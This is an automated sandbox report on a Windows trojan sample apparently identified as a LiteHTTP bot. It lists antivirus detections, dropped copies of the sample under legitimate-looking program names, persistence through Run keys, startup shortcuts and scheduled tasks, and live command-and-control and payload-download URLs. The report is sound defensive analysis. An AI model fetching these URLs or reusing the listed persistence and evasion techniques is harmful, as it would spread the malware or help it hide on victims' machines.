                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1592066 Sample: random.exe Startdate: 15/01/2025 Architecture: WINDOWS Score: 100 40 tmpfiles.org 2->40 46 Suricata IDS alerts for network traffic 2->46 48 Malicious sample detected (through community Yara rule) 2->48 50 Antivirus detection for dropped file 2->50 52 7 other signatures 2->52 8 random.exe 16 234 2->8         started        13 random.exe 2->13         started        15 random.exe 2->15         started        17 random.exe 2->17         started        signatures3 process4 dnsIp5 42 87.120.126.5, 59239, 80 UNACS-AS-BG8000BurgasBG Bulgaria 8->42 44 tmpfiles.org 104.21.21.16, 443, 59240, 59241 CLOUDFLARENETUS United States 8->44 32 C:\Users\user\...\windowspowershell.exe, PE32 8->32 dropped 34 C:\Users\user\OneDrive\windows sidebar.exe, PE32 8->34 dropped 36 C:\Users\...\windows portable devices.exe, PE32 8->36 dropped 38 38 other malicious files 8->38 dropped 66 Protects its processes via BreakOnTermination flag 8->66 68 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 8->68 70 Self deletion via cmd or bat file 8->70 72 Uses schtasks.exe or at.exe to add and modify task schedules 8->72 19 cEp3d38.exe 8->19         started        22 cmd.exe 1 8->22         started        24 schtasks.exe 1 8->24         started        file6 signatures7 process8 signatures9 54 Antivirus detection for dropped file 19->54 56 Multi AV Scanner detection for dropped file 19->56 58 Machine Learning detection for dropped file 19->58 60 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 19->60 62 Uses ping.exe to sleep 22->62 64 Uses ping.exe to check the status of other devices and networks 22->64 26 conhost.exe 22->26         started        28 PING.EXE 1 22->28         started        30 conhost.exe 24->30         started        process10

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    random.exe21%ReversingLabsByteCode-MSIL.Trojan.Zilla
                    random.exe32%VirustotalBrowse
                    random.exe100%AviraHEUR/AGEN.1351936
                    random.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\random.exe100%AviraHEUR/AGEN.1351936
                    C:\Users\user\OneDrive\microsoft.exe100%AviraHEUR/AGEN.1351936
                    C:\Users\user\OneDrive\autoit3.exe100%AviraHEUR/AGEN.1351936
                    C:\Users\user\OneDrive\java.exe100%AviraHEUR/AGEN.1351936
                    C:\Users\user\OneDrive\jdownloader.exe100%AviraHEUR/AGEN.1351936
                    C:\Users\user\OneDrive\internet explorer.exe100%AviraHEUR/AGEN.1351936
                    C:\Users\user\OneDrive\msecache.exe100%AviraHEUR/AGEN.1351936
                    C:\Users\user\OneDrive\common files.exe100%AviraHEUR/AGEN.1351936
                    C:\Users\user\OneDrive\mozilla maintenance service.exe100%AviraHEUR/AGEN.1351936
                    C:\Users\user\OneDrive\reference assemblies.exe100%AviraHEUR/AGEN.1351936
                    C:\Users\user\OneDrive\microsoft.net.exe100%AviraHEUR/AGEN.1351936
                    C:\Users\user\OneDrive\mmzjdoevgizobizuwenrntjysakvaaofwgwplryd.exe100%AviraHEUR/AGEN.1351936
                    C:\Users\user\AppData\Roaming\cEp3d38.exe100%AviraHEUR/AGEN.1351936
                    C:\Users\user\OneDrive\google.exe100%AviraHEUR/AGEN.1351936
                    C:\Users\user\OneDrive\microsoft office.exe100%AviraHEUR/AGEN.1351936
                    C:\Users\user\OneDrive\msbuild.exe100%AviraHEUR/AGEN.1351936
                    C:\Users\user\AppData\Roaming\random.exe100%Joe Sandbox ML
                    C:\Users\user\OneDrive\microsoft.exe100%Joe Sandbox ML
                    C:\Users\user\OneDrive\autoit3.exe100%Joe Sandbox ML
                    C:\Users\user\OneDrive\java.exe100%Joe Sandbox ML
                    C:\Users\user\OneDrive\jdownloader.exe100%Joe Sandbox ML
                    C:\Users\user\OneDrive\internet explorer.exe100%Joe Sandbox ML
                    C:\Users\user\OneDrive\msecache.exe100%Joe Sandbox ML
                    C:\Users\user\OneDrive\common files.exe100%Joe Sandbox ML
                    C:\Users\user\OneDrive\mozilla maintenance service.exe100%Joe Sandbox ML
                    C:\Users\user\OneDrive\reference assemblies.exe100%Joe Sandbox ML
                    C:\Users\user\OneDrive\microsoft.net.exe100%Joe Sandbox ML
                    C:\Users\user\OneDrive\mmzjdoevgizobizuwenrntjysakvaaofwgwplryd.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\cEp3d38.exe100%Joe Sandbox ML
                    C:\Users\user\OneDrive\google.exe100%Joe Sandbox ML
                    C:\Users\user\OneDrive\microsoft office.exe100%Joe Sandbox ML
                    C:\Users\user\OneDrive\msbuild.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\cEp3d38.exe21%ReversingLabsByteCode-MSIL.Trojan.Zilla
                    C:\Users\user\AppData\Roaming\random.exe21%ReversingLabsByteCode-MSIL.Trojan.Zilla
                    C:\Users\user\OneDrive\autoit3.exe21%ReversingLabsByteCode-MSIL.Trojan.Zilla
                    C:\Users\user\OneDrive\common files.exe21%ReversingLabsByteCode-MSIL.Trojan.Zilla
                    C:\Users\user\OneDrive\google.exe21%ReversingLabsByteCode-MSIL.Trojan.Zilla
                    C:\Users\user\OneDrive\internet explorer.exe21%ReversingLabsByteCode-MSIL.Trojan.Zilla
                    C:\Users\user\OneDrive\java.exe21%ReversingLabsByteCode-MSIL.Trojan.Zilla
                    C:\Users\user\OneDrive\jdownloader.exe21%ReversingLabsByteCode-MSIL.Trojan.Zilla
                    C:\Users\user\OneDrive\microsoft office.exe21%ReversingLabsByteCode-MSIL.Trojan.Zilla
                    C:\Users\user\OneDrive\microsoft.exe21%ReversingLabsByteCode-MSIL.Trojan.Zilla
                    C:\Users\user\OneDrive\microsoft.net.exe21%ReversingLabsByteCode-MSIL.Trojan.Zilla
                    C:\Users\user\OneDrive\mmzjdoevgizobizuwenrntjysakvaaofwgwplryd.exe21%ReversingLabsByteCode-MSIL.Trojan.Zilla
                    C:\Users\user\OneDrive\mozilla maintenance service.exe21%ReversingLabsByteCode-MSIL.Trojan.Zilla
                    C:\Users\user\OneDrive\msbuild.exe21%ReversingLabsByteCode-MSIL.Trojan.Zilla
                    C:\Users\user\OneDrive\msecache.exe21%ReversingLabsByteCode-MSIL.Trojan.Zilla
                    C:\Users\user\OneDrive\reference assemblies.exe21%ReversingLabsByteCode-MSIL.Trojan.Zilla
                    C:\Users\user\OneDrive\windows defender.exe21%ReversingLabsByteCode-MSIL.Trojan.Zilla
                    C:\Users\user\OneDrive\windows mail.exe21%ReversingLabsByteCode-MSIL.Trojan.Zilla
                    C:\Users\user\OneDrive\windows media player.exe21%ReversingLabsByteCode-MSIL.Trojan.Zilla
                    C:\Users\user\OneDrive\windows multimedia platform.exe21%ReversingLabsByteCode-MSIL.Trojan.Zilla
                    C:\Users\user\OneDrive\windows nt.exe21%ReversingLabsByteCode-MSIL.Trojan.Zilla
                    C:\Users\user\OneDrive\windows photo viewer.exe21%ReversingLabsByteCode-MSIL.Trojan.Zilla
                    C:\Users\user\OneDrive\windows portable devices.exe21%ReversingLabsByteCode-MSIL.Trojan.Zilla
                    C:\Users\user\OneDrive\windows sidebar.exe21%ReversingLabsByteCode-MSIL.Trojan.Zilla
                    C:\Users\user\OneDrive\windowspowershell.exe21%ReversingLabsByteCode-MSIL.Trojan.Zilla

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://tmpfiles.org/dl/19480319/anubis.exe0%Avira URL Cloudsafe
                    https://tmpfiles.org0%Avira URL Cloudsafe
                    http://tmpfiles.org0%Avira URL Cloudsafe
                    http://87.120.126.50%Avira URL Cloudsafe
                    http://87.120.126.5/VmCetSC7/page.php0%Avira URL Cloudsafe
                    https://tmpfiles.org/dl/19480319/anubis.exe0%Avira URL Cloudsafe
                    http://tmpfiles.orgd0%Avira URL Cloudsafe
                    http://87.120.126.5/VmCetSC7/page.phpP0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    tmpfiles.org
                    		104.21.21.16
                    		truefalse
                      		high
                      s-part-0017.t-0009.t-msedge.net
                      		13.107.246.45
                      		truefalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://tmpfiles.org/dl/19480319/anubis.exefalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://87.120.126.5/VmCetSC7/page.phptrue
                        • Avira URL Cloud: safe
                        		unknown
                        https://tmpfiles.org/dl/19480319/anubis.exefalse
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://87.120.126.5random.exe, 00000001.00000002.2008201035.000000000339F000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000001.00000002.2008201035.00000000033A7000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000001.00000002.2008201035.00000000032CD000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://tmpfiles.orgdrandom.exe, 00000001.00000002.2008201035.0000000003365000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000001.00000002.2008201035.0000000003326000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://tmpfiles.orgrandom.exe, 00000001.00000002.2008201035.0000000003365000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://tmpfiles.orgrandom.exe, 00000001.00000002.2008201035.0000000003365000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000001.00000002.2008201035.0000000003326000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000001.00000002.2008201035.0000000003315000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namerandom.exe, 00000001.00000002.2008201035.00000000031A2000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://87.120.126.5/VmCetSC7/page.phpPrandom.exe, 00000001.00000002.2008201035.000000000339F000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000001.00000002.2008201035.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000001.00000002.2008201035.00000000033A7000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          104.21.21.16
                          		tmpfiles.orgUnited States
                          		13335CLOUDFLARENETUSfalse
                          87.120.126.5
                          		unknownBulgaria
                          		25206UNACS-AS-BG8000BurgasBGtrue

                          General Information

                          Joe Sandbox version:42.0.0 Malachite
                          Analysis ID:1592066
                          Start date and time:2025-01-15 18:09:07 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 5m 44s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:16
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Critical Process Termination
                          Sample name:random.exe
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@14/52@1/2
                          EGA Information:
                          • Successful, ratio: 20%
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 166
                          • Number of non-executed functions: 6
                          Cookbook Comments:
                          • Found application associated with file extension: .exe

                          Warnings

                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                          • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56, 4.175.87.197
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, d.3.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.8.0.4.0.0.3.0.1.3.0.6.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
                          • Execution Graph export aborted for target cEp3d38.exe, PID 5876 because it is empty
                          • Execution Graph export aborted for target random.exe, PID 1692 because it is empty
                          • Execution Graph export aborted for target random.exe, PID 4516 because it is empty
                          • Execution Graph export aborted for target random.exe, PID 5452 because it is empty
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          12:09:59API Interceptor1019x Sleep call for process: random.exe modified
                          12:11:04API Interceptor12x Sleep call for process: cEp3d38.exe modified
                          17:10:43Task SchedulerRun new task: TaskHelper path: C:\Users\user\Desktop\random.exe
                          17:10:47AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run TaskHelper C:\Users\user\Desktop\random.exe
                          17:10:56AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\random.lnk
                          17:11:39AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run TaskHelper C:\Users\user\Desktop\random.exe
                          17:11:48AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run TaskHelper C:\Users\user\Desktop\random.exe
                          17:11:57AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cEp3d38.lnk

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          104.21.21.16file.exeGet hashmaliciousLummaC, Amadey, HTMLPhisher, LummaC Stealer, Stealc, VidarBrowse
                          • tmpfiles.org/dl/15306544/pohtent.exe
                          87.120.126.53lhrJ4X.exeGet hashmaliciousLiteHTTP BotBrowse
                          • 87.120.126.5/VmCetSC7/page.php
                          3u8A2xjbBT.exeGet hashmaliciousLiteHTTP BotBrowse
                          • 87.120.126.5/VmCetSC7/page.php

                          Domains

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          s-part-0017.t-0009.t-msedge.netACH REMITTANCE DOCUMENT 15.01.25.xlsbGet hashmaliciousUnknownBrowse
                          • 13.107.246.45
                          https://tinyurl.com/AmconconstructionGet hashmaliciousUnknownBrowse
                          • 13.107.246.45
                          Zohobooks Voip CaIIer left (4) voice message from +1 (___) ___-__92 [MSG ID-zNeaDpAKAIgeQjKGl].emlGet hashmaliciousHTMLPhisherBrowse
                          • 13.107.246.45
                          https://u13762205.ct.sendgrid.net/ls/click?upn=u001.2N-2FFSd8Mh5tdTcK2pEXUToH0F5-2Fq3FDo8pnKFzcXMK24EOVQRPQXOzov3WP6TeQDbpOFMAzOhzk6g52qaRBXMg-3D-3DIjNL_PKcFXsnzduNOkTk1M1BuFSXBwpDtJ5JnfBBGS8mWfSDpSIzzZrzaRAqzsWn9I2SACyGbOCQAHofmU9ue-2Bfpl8m5UVDAXfATbU3zHgCM2w6TpOzhFbmwlUQoZzHTxRoJD6sBCzgzJz3SY7rmsp-2BquYHmL2DTOkQggmMFIfKhNPVaBf8NTmimDBPZdcr9YqjF8L6hryY10MBbjsSOUH778gw-3D-3DGet hashmaliciousUnknownBrowse
                          • 13.107.246.45
                          https://shunnarah.com/attorney/candace-t-brownGet hashmaliciousUnknownBrowse
                          • 13.107.246.45
                          https://www.databreachtoday.com/showOnDemand.php?webinarID=6054&rf=OD_REQUEST;Get hashmaliciousUnknownBrowse
                          • 13.107.246.45
                          https://yjdjraabb.cc.rs6.net/tn.jsp?f=001cD7EmEKntgjghgQWpq9s2lW_mstWA0PSxRR7i3h0LbK5HgiPx3gu3HduoBs_Rnxmx0i7FlZL9378mrMLd5LlF6GT3bXi2U8GDrXfdsc2qPaLW94j0wm6KbaRHgZvZZRsEDv_wILG0rjmaLTfE5xpKJl15r5SI1xPSSiQsd9YUqKeemOHvTBSlSwV6tHZZ755Z52-jrPWl0FY7ZZ-PKGQ_IxPzhJqeaH15y4Vkailf2jrOpi4MibpjQ==&c=wK30YrUWFPbHl2B1oEErLYSqPkydS65M2el3xt7vMb11ny4WQ0yJgQ==&ch=8IgRaXvzzpu7qgxKTkXdqoYWo2ml_yYytv3GcZQiibggV2wrl_cJAA==Get hashmaliciousUnknownBrowse
                          • 13.107.246.45
                          https://aMER.ethamoskag.ru/0cUrcw3/#Mbob@bobco.comGet hashmaliciousUnknownBrowse
                          • 13.107.246.45
                          https://guidantmeasurement-dot-level-district-447409-i0.as.r.appspot.com/Get hashmaliciousHTMLPhisher, ReCaptcha PhishBrowse
                          • 13.107.246.45
                          https://atgroupbe.com/?mzbexmhu=bbd299e40cc6ba4977bf44a725eec5648bda7170169e3fbfd31a05747fa7276fd2437dda5a583d6a5ff345cb6fce6d6bd82e92021cc24ab98d2ebfffc47a5826&qrc=nmertens@vanas.euGet hashmaliciousHTMLPhisherBrowse
                          • 13.107.246.45
                          tmpfiles.orgtest.doc.bin.docGet hashmaliciousUnknownBrowse
                          • 104.21.21.16
                          test.doc.bin.docGet hashmaliciousUnknownBrowse
                          • 104.21.21.16
                          test.doc.bin.docGet hashmaliciousUnknownBrowse
                          • 104.21.21.16
                          file.exeGet hashmaliciousAmadey, HTMLPhisher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                          • 104.21.21.16
                          lIocM276SA.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, MicroClip, StealcBrowse
                          • 172.67.195.247
                          file.exeGet hashmaliciousLummaC, Amadey, HTMLPhisher, LummaC Stealer, Stealc, VidarBrowse
                          • 104.21.21.16
                          trSK2fqPeB.exeGet hashmaliciousAmadey, RedLine, XWorm, XmrigBrowse
                          • 104.21.21.16
                          OmnqazpM3P.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, Stealc, VidarBrowse
                          • 104.21.21.16
                          SecuriteInfo.com.Win32.MalwareX-gen.20001.2923.exeGet hashmaliciousUnknownBrowse
                          • 104.21.21.16
                          SecuriteInfo.com.Win32.MalwareX-gen.20001.2923.exeGet hashmaliciousUnknownBrowse
                          • 104.21.21.16

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          UNACS-AS-BG8000BurgasBGdlr.mips.elfGet hashmaliciousUnknownBrowse
                          • 87.120.127.227
                          1736928425effdd3d663e7ae08ee64667d92e2866d7996db3d213458dc5837f6c732ac1388894.dat-decoded.exeGet hashmaliciousXWormBrowse
                          • 87.120.116.179
                          Order Drawing.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                          • 87.120.116.245
                          Material Requirments.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                          • 87.120.116.245
                          preliminary drawing.pif.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                          • 87.120.127.120
                          5tCuNr661k.exeGet hashmaliciousRedLineBrowse
                          • 87.120.120.86
                          5tCuNr661k.exeGet hashmaliciousRedLineBrowse
                          • 87.120.120.86
                          shaLnqmyTS.exeGet hashmaliciousRedLineBrowse
                          • 87.120.120.86
                          shaLnqmyTS.exeGet hashmaliciousRedLineBrowse
                          • 87.120.120.86
                          zAGUEDGSTM.exeGet hashmaliciousRedLineBrowse
                          • 87.120.120.86
                          CLOUDFLARENETUShttps://docs.google.com/drawings/d/1Fix-5JDCTM2QJpjq3c_NOGTxMuhYRiEX3wdVSCqQc9w/preview?FwaxQGet hashmaliciousUnknownBrowse
                          • 104.21.79.87
                          DOCU800147001.exeGet hashmaliciousGuLoaderBrowse
                          • 104.21.32.1
                          firstontario.docxGet hashmaliciousUnknownBrowse
                          • 1.1.1.1
                          lummm_lzmb.exeGet hashmaliciousLummaCBrowse
                          • 104.21.67.165
                          https://solve.lzmb.org/awjsx.captcha?u=a85c9e46-f1ff-475f-b74c-c23cf236a082Get hashmaliciousUnknownBrowse
                          • 104.21.78.33
                          https://solve.xfzz.org/awjsx.captcha?u=c56ed68e-fc67-4e24-b8ac-6adc700e0877%20#%20%E2%9C%85%20''I%20am%20not%20a%20robot%20-%20reCAPTCHA%20Verification%20ID:%203467''Get hashmaliciousUnknownBrowse
                          • 104.21.32.1
                          https://tinyurl.com/AmconconstructionGet hashmaliciousUnknownBrowse
                          • 104.17.25.14
                          Zohobooks Voip CaIIer left (4) voice message from +1 (___) ___-__92 [MSG ID-zNeaDpAKAIgeQjKGl].emlGet hashmaliciousHTMLPhisherBrowse
                          • 104.17.25.14
                          https://bluefiles.com/fr/reader/document/2c33782e98658214c7dff875dd234fc3b9b9a60915ac1685fe35abcc657c139dGet hashmaliciousUnknownBrowse
                          • 1.1.1.1

                          JA3 Fingerprints

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          3b5074b1b5d032e5620f69f9f700ff0ef5mfkHLLVe.dllGet hashmaliciousWannacryBrowse
                          • 104.21.21.16
                          hNgIvHRuTU.dllGet hashmaliciousWannacryBrowse
                          • 104.21.21.16
                          lummm_lzmb.exeGet hashmaliciousLummaCBrowse
                          • 104.21.21.16
                          2lX8Z3eydC.dllGet hashmaliciousWannacryBrowse
                          • 104.21.21.16
                          aASfOObWpW.exeGet hashmaliciousUnknownBrowse
                          • 104.21.21.16
                          aASfOObWpW.exeGet hashmaliciousUnknownBrowse
                          • 104.21.21.16
                          Updater.exeGet hashmaliciousUnknownBrowse
                          • 104.21.21.16
                          Updater.exeGet hashmaliciousUnknownBrowse
                          • 104.21.21.16
                          Personliche Nachricht fur e4060738.pdfGet hashmaliciousUnknownBrowse
                          • 104.21.21.16

                          Dropped Files

                          No context

                          Created / dropped Files

                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\random.exe.log

                          Download File
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1351
                          Entropy (8bit):5.351253520337459
                          Encrypted:false
                          SSDEEP:24:ML9E4KlKDE4KhKiKhgLE4qE4qpsXE4qdKtKIE4oKNzKoZAE4KzeoE4Ks:MxHKlYHKh3ogLHqHpH7tHo6hAHKzeoHP
                          MD5:22A6191126D147A350662EA5A2160456
                          SHA1:68506C08AC2DABCB528EEF5DBE5BA6F68CC24C8A
                          SHA-256:87F4AF4DA90B01F98B968022A935EF201D3121AADD057BBF572385A8F59A6CE6
                          SHA-512:B25282FAF3E3F27ED8DB091085D18C9C0009696CD447F07196173A479E75EEBA3057875336606BECE3A978498869027B8A5686FD6256F2CC97E999D1DCAAC411
                          Malicious:true
                          Reputation:low
                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\96012833bebd5f21714fc508603cda97\System.Management.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa1448

                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\random.lnk

                          Download File
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Thu Oct 5 08:16:09 2023, mtime=Wed Jan 15 16:10:42 2025, atime=Wed Jan 15 16:09:58 2025, length=38400, window=hide
                          Category:dropped
                          Size (bytes):626
                          Entropy (8bit):5.0021946644140804
                          Encrypted:false
                          SSDEEP:12:8m5ilClzYNbRrZYUGKE42RyILjA9D6cICM0lAiF4mV:8m5ilVn9vd92RyOAxtdGRm
                          MD5:793AAB430A841A0727BC48458BC62AFA
                          SHA1:D6FD9EB83D72258287F6A1FF2948B795ABB60B0C
                          SHA-256:78928D86A88E81A99785FC72E86341D83A5A396EC2953753704810CF66E32160
                          SHA-512:4F3426EC84B11ADDE93B78D6203948169E294248B09AA4A217A2C392314A49DE792911CFB60C0E82259D7C1524E912F68A6D9710D24D32B2C231007DDD0A9DBB
                          Malicious:false
                          Reputation:low
                          Preview:L..................F.... ....;..l...#..hpg....'Npg...............................P.O. .:i.....+00.:...:..,.LB.)...A&...&........DDj....'..l......hpg....`.2...../Z@. .random.exe..F......EW.J/Z@...........................4...r.a.n.d.o.m...e.x.e.......O...............-.......N..............?.....C:\Users\user\Desktop\random.exe..'.....\.....\.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.r.a.n.d.o.m...e.x.e...C.:.\.U.s.e.r.s.\.t.i.n.a.\.D.e.s.k.t.o.p.`.......X.......648351...........hT..CrF.f4... .u...c....,...E...hT..CrF.f4... .u...c....,...E..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                          C:\Users\user\AppData\Roaming\cEp3d38.exe

                          Download File
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):38400
                          Entropy (8bit):5.495343186946422
                          Encrypted:false
                          SSDEEP:768:XL5VwLMjxZRdazKglRzlllllllFIEDGGFbd4m60/c11UhOo:b5eg1ZRdazKglRzlllllllFVGGFbWQGK
                          MD5:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          SHA1:6B804AAD52F0DFDA2303DDE5C0E641BB20F14FC2
                          SHA-256:71CFDBE5A32FB5CB2A5EFF926C8B9000B231F4990B258872E7CF3A0E4C46BCCF
                          SHA-512:8A331CE713F81BC3050E80CBCA8D6E305EDE44E28684DBCA4E59C2E5FF7D0A05AD50F65DC4D2258FA64110030EC4F9ACBCF5D3E6BA273345BE4FB00C6016EB35
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: C:\Users\user\AppData\Roaming\cEp3d38.exe, Author: Joe Security
                          • Rule: MALWARE_Win_CoreBot, Description: Detects CoreBot, Source: C:\Users\user\AppData\Roaming\cEp3d38.exe, Author: ditekSHen
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 21%
                          Reputation:low
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g..............0.................. ........@.. ....................................`.................................<...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H........W...O...........................................................0..8.......s=.....(....}......}......}.....|......(...+.|....(....*.0..r........(.....(.......(.....(.....(....-.r...p+.r...p.(.....(......(.........J...%.r...p.%..(/....%.r...p.%..(/....%.r)..p.%..(/....%.r3..p.%..(/....%.r=..p.%....(/....%..rG..p.%....(/....%..rQ..p.%..~....(/....%..r[..p.%..~....(/....(......~......(....(0.......re..p(........,..rm..p(......J.....r...po........9.........L...%..:.o ...

                          C:\Users\user\AppData\Roaming\random.exe

                          Download File
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):38400
                          Entropy (8bit):5.495343186946422
                          Encrypted:false
                          SSDEEP:768:XL5VwLMjxZRdazKglRzlllllllFIEDGGFbd4m60/c11UhOo:b5eg1ZRdazKglRzlllllllFVGGFbWQGK
                          MD5:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          SHA1:6B804AAD52F0DFDA2303DDE5C0E641BB20F14FC2
                          SHA-256:71CFDBE5A32FB5CB2A5EFF926C8B9000B231F4990B258872E7CF3A0E4C46BCCF
                          SHA-512:8A331CE713F81BC3050E80CBCA8D6E305EDE44E28684DBCA4E59C2E5FF7D0A05AD50F65DC4D2258FA64110030EC4F9ACBCF5D3E6BA273345BE4FB00C6016EB35
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: C:\Users\user\AppData\Roaming\random.exe, Author: Joe Security
                          • Rule: MALWARE_Win_CoreBot, Description: Detects CoreBot, Source: C:\Users\user\AppData\Roaming\random.exe, Author: ditekSHen
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 21%
